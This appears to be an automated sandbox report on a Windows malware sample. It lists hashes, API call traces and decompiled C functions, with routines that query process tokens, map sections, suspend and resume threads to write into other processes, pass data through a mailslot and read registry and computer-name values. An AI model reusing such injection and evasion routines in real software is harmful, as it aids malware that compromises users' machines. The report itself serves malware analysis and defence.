  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
